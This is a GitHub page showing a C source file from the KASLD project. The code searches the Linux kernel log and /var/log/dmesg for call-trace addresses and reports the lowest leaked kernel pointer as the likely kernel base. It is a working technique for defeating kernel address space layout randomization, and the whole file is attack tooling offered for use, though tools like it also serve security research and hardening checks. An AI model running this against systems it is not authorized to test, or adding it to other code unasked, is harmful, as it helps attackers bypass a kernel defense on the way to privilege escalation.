forked from bcoles/kasld
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathdmesg_backtrace.c
105 lines (84 loc) · 2.35 KB
/
dmesg_backtrace.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
// This file is part of KASLD - https://github.com/bcoles/kasld
//
// Search kernel log for call traces and return the lowest address
// that looks like a kernel pointer.
//
// Requires:
// - kernel.dmesg_restrict = 0; or CAP_SYSLOG capabilities; or
// readable /var/log/dmesg.
// - kernel.panic_on_oops = 0 (Default on most systems).
// ---
// <[email protected]>
#define _GNU_SOURCE
#include "kasld.h"
#include "include/syslog.h"
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <unistd.h>
unsigned long search_dmesg_kernel_pointers() {
char *syslog;
char *ptr;
char *endptr;
int size;
unsigned long addr = 0;
unsigned long leaked_addr = 0;
printf("[.] searching dmesg for call trace kernel pointers ...\n");
if (mmap_syslog(&syslog, &size))
return 0;
ptr = strtok(syslog, "[<");
while ((ptr = strtok(NULL, "[<")) != NULL) {
leaked_addr = strtoul(&ptr[0], &endptr, 16);
if (!leaked_addr)
continue;
if (leaked_addr >= KERNEL_BASE_MIN && leaked_addr <= KERNEL_BASE_MAX) {
//printf("Found kernel pointer: %lx\n", leaked_addr);
if (!addr || leaked_addr < addr)
addr = leaked_addr;
}
}
return addr;
}
unsigned long search_dmesg_log_file_kernel_pointers() {
FILE *f;
char *ptr;
char *endptr;
char *line = 0;
size_t size = 0;
const char *path = "/var/log/dmesg";
unsigned long leaked_addr = 0;
unsigned long addr = 0;
printf("[.] searching %s for call trace kernel pointers ...\n", path);
f = fopen(path, "rb");
if (f == NULL) {
perror("[-] fopen");
return 0;
}
while ((getline(&line, &size, f)) != -1) {
ptr = strtok(line, "[<");
while ((ptr = strtok(NULL, "[<")) != NULL) {
leaked_addr = strtoul(&ptr[0], &endptr, 16);
if (!leaked_addr)
continue;
if (leaked_addr >= KERNEL_BASE_MIN && leaked_addr <= KERNEL_BASE_MAX) {
// printf("Found kernel pointer: %lx\n", leaked_addr);
if (!addr || leaked_addr < addr)
addr = leaked_addr;
}
}
}
fclose(f);
return addr;
}
int main() {
unsigned long addr = search_dmesg_kernel_pointers();
if (!addr)
addr = search_dmesg_log_file_kernel_pointers();
if (!addr)
return 1;
printf("lowest leaked address: %lx\n", addr);
printf("possible kernel base: %lx\n", addr & -KERNEL_ALIGN);
return 0;
}